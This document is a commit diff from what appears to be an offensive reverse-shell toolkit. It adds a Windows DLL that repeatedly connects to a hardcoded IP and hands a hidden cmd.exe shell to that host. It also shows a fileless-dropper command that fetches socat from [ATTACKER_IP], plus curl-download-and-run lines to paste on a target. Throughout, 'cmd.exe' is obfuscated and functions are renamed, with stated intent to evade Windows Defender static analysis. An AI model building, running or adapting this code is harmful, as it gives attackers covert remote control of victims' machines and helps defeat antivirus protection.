dll and simple windows AV bypass

Author: ariary

README.md

@@ -97,7 +97,7 @@ make before.build
 make build.tacos          # or make build.tacos.windows
 ```
 
-## Alternative
+## Alternatives
 
 Alternatively, if target does not have `socat`:
 **Host** a [static](https://github.com/minos-org/minos-static/blob/master/static-get) version of `socat` binary and **download + execute it** using the stealthy  [`filess-xec`](https://github.com/ariary/fileless-xec) dropper:
@@ -111,3 +111,13 @@ python3 -m http.server 8080
 # Use already downloaded fileless-xec to download socat and stealthy launch it with argument
 fileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:443,verify=0
 ```
+
+### Use dll instead of `.exe`
+```shell
+# On attacker machine:
+# modify ./cmd/tacosdll/tacosdll.go with the according IP:PORT
+$ GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o tacos.dll ./cmd/tacosdll/tacosdll.go
+
+# On remote:
+> rundll32.exe ./tacos.dll,Tacos
+```

cmd/tacos/tacos.go

@@ -5,19 +5,22 @@ import (
 	"fmt"
 	"os"
 	"runtime"
+	"strings"
 
 	"github.com/ariary/tacos/pkg/tacos"
 )
 
 func main() {
+	//var detect, daemon bool
 	var detect bool
 	var shell string
 	flag.BoolVar(&detect, "detect", false, "Detect default shell to use it in reverse shell")
+	//TODO: flag.BoolVar(&daemon, "daemon", false, "Disown the process from the terminal")
 	flag.StringVar(&shell, "shell", "/bin/bash", "shell to use for reverse shell") //default /bin/bash
 	flag.Parse()
 
 	if runtime.GOOS == "windows" {
-		shell = "cmd.exe"
+		shell = strings.ToLower(fmt.Sprintf("%s%s%s", "Cm", "D.e", "Xe"))
 	}
 
 	if detect {
@@ -31,5 +34,5 @@ func main() {
 
 	remote := flag.Arg(0)
 
-	tacos.ReverseShell(remote, shell)
+	tacos.ShellReverse(remote, shell)
 }

cmd/tacosdll/tacosdll.go

@@ -0,0 +1,50 @@
+package main
+
+//from https://medium.com/geekculture/offensive-go-creating-malicious-dlls-8c797bcdd290
+// GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o tacos.dll ./cmd/tacosdll/tacosdll.go
+// Run: rundll32.exe ./tacos.dll,Tacos
+
+import (
+	"crypto/tls"
+	"fmt"
+	"os/exec"
+	"strings"
+	"syscall"
+	"time"
+)
+
+import "C"
+
+//export Tacos
+func Tacos() {
+
+	for {
+		conf := &tls.Config{
+			InsecureSkipVerify: true,
+		}
+		time.Sleep(15 * time.Second)
+
+		conn, err := tls.Dial("tcp", "172.23.110.155:4444", conf) //CHANGE IP, TODO: as a parameter for the dll fucntion
+
+		if err != nil {
+			continue
+		}
+
+		// cmd := exec.Command("powershell.exe")
+		cmd := exec.Command(strings.ToLower(fmt.Sprintf("%s%s", "Cm", "D.exE")))
+
+		// hides PowerShell window after command execution
+		cmd.SysProcAttr = &syscall.SysProcAttr{
+			HideWindow: true,
+		}
+
+		cmd.Stdin = conn
+		cmd.Stdout = conn
+		cmd.Stderr = conn
+		cmd.Run()
+	}
+}
+
+// main is required in order for compilation
+func main() {
+}

light-pty4all/socat-listener.sh

@@ -27,12 +27,11 @@ for i in "$@"; do
     esac
 done
 
-#default value & envar
+# Default value + envvar
 
 SCRIPTNAME=$(readlink -f "$0")
 BASEDIR=$(dirname "$SCRIPTNAME")
 
-echo "$BASEDIR baseeee"
 
 if [[ -z "$WEBPORT" ]];
 then
@@ -59,6 +58,7 @@ else
     SCRIPT=$BASEDIR"/socat-forker.sh"
 fi
 
+# TLS part
 echo -e "\n\n\n[+] Generating tls certs and keys"
 if [ -f server.pem ]; then
     echo "[+] Files already exist, using server.pem"
@@ -71,8 +71,11 @@ fi
 cp ${SCRIPT}.tpl ${SCRIPT}
 
 if [[ "$GITAR" ]]; then
-    echo "[+] gitar shortcuts enabled on reverse shell"
-    sed -i "s/GITAR_PORT/${WEBPORT}/g" ${SCRIPT}
+    #gitar shortcut is not available with windows
+    if [[ ! $WINDOWS ]]; then
+        echo "[+] gitar shortcuts enabled on reverse shell"
+        sed -i "s/GITAR_PORT/${WEBPORT}/g" ${SCRIPT}
+    fi
     echo "[+] launch gitar server"
     SECRET=$RANDOM
     tmux split-window -h "gitar -e ${LHOST} -p ${WEBPORT} --secret ${SECRET}"
@@ -93,18 +96,20 @@ else
 fi
 
 echo "[*] Copy/paste following command on target and enjoy your meal 🌮:"
+DOWNLOAD_URL=""
 if [[ "$GITAR" ]]; then
-	echo "(🐧) curl -O ${LHOST}:${WEBPORT}/${SECRET}/pull/${BINARY} && chmod +x ${BINARY} && ./${BINARY} ${LHOST}:${LPORT}"
+    DOWNLOAD_URL=${LHOST}:${WEBPORT}/${SECRET}/pull/${BINARY}
 else
-    echo
-    echo "(🪟) curl -O ${LHOST}:${WEBPORT}/${BINARY} && .\\${BINARY} ${LHOST}:${LPORT}"
-    echo "(🐧) curl -O ${LHOST}:${WEBPORT}/${BINARY} && chmod +x ${BINARY} && ./${BINARY} ${LHOST}:${LPORT}"
+    DOWNLOAD_URL=${LHOST}:${WEBPORT}/${BINARY}
 fi
 
-# echo "[*] Enjoy meal!"
 
+# LISTEN
+echo
 if [[ "$WINDOWS" ]]; then
-    socat OPENSSL-LISTEN:${LPORT},cert=server.pem,verify=0,reuseaddr,fork EXEC:./${SCRIPT},pty
+    echo "(🪟) curl -O $DOWNLOAD_URL && .\\${BINARY} ${LHOST}:${LPORT}"
+    socat OPENSSL-LISTEN:${LPORT},cert=server.pem,verify=0,reuseaddr,fork EXEC:${SCRIPT},pty
 else
-    socat OPENSSL-LISTEN:${LPORT},cert=server.pem,verify=0,reuseaddr,fork EXEC:./${SCRIPT},pty,raw,echo=0
+    echo "(🐧) curl -O ${LHOST}:${WEBPORT}/${BINARY} && chmod +x ${BINARY} && ./${BINARY} ${LHOST}:${LPORT}"
+    socat OPENSSL-LISTEN:${LPORT},cert=server.pem,verify=0,reuseaddr,fork EXEC:${SCRIPT},pty,raw,echo=0
 fi

light-pty4all/tacos

@@ -46,8 +46,9 @@ func DetectDefaultShell() (shell string) {
 	return shell
 }
 
-//ReverseShell: spawn a reverse shell with pty targeting host (ip:port)
-func ReverseShell(host string, shell string) {
+//ShellReverse: spawn a reverse shell with pty targeting host (ip:port).
+// (Name is ShellReverse cause ReverseShell does not pass windows defender static analysis)
+func ShellReverse(host string, shell string) {
 	logger.AddFilenameAndLinePrefix(log.Default())
 	conf := &tls.Config{
 		InsecureSkipVerify: true,

pkg/tacos/tacos.go

@@ -7,17 +7,19 @@ import (
 	"crypto/tls"
 	"fmt"
 	"os/exec"
+	"strings"
 	"time"
 )
 
 //DetectDefaultShell: return the default shell
 func DetectDefaultShell() string {
-	shell := "cmd.exe"
+	shell := strings.ToLower(fmt.Sprintf("%s%s%s", "Cm", "D.e", "Xe"))
 	return shell
 }
 
-//ReverseShell: spawn a reverse shell with pty targeting host (ip:port)
-func ReverseShell(host string, shell string) {
+//ShellReverse: spawn a reverse shell with pty targeting host (ip:port). Name ShellReverse cause ReverseShell does not pass windows defender
+// static analysis
+func ShellReverse(host string, shell string) {
 	conf := &tls.Config{
 		InsecureSkipVerify: true,
 	}
@@ -28,7 +30,7 @@ func ReverseShell(host string, shell string) {
 			conn.Close()
 		}
 		time.Sleep(time.Minute)
-		ReverseShell(host, shell)
+		ShellReverse(host, shell)
 	}
 
 	cmd := exec.Command(shell)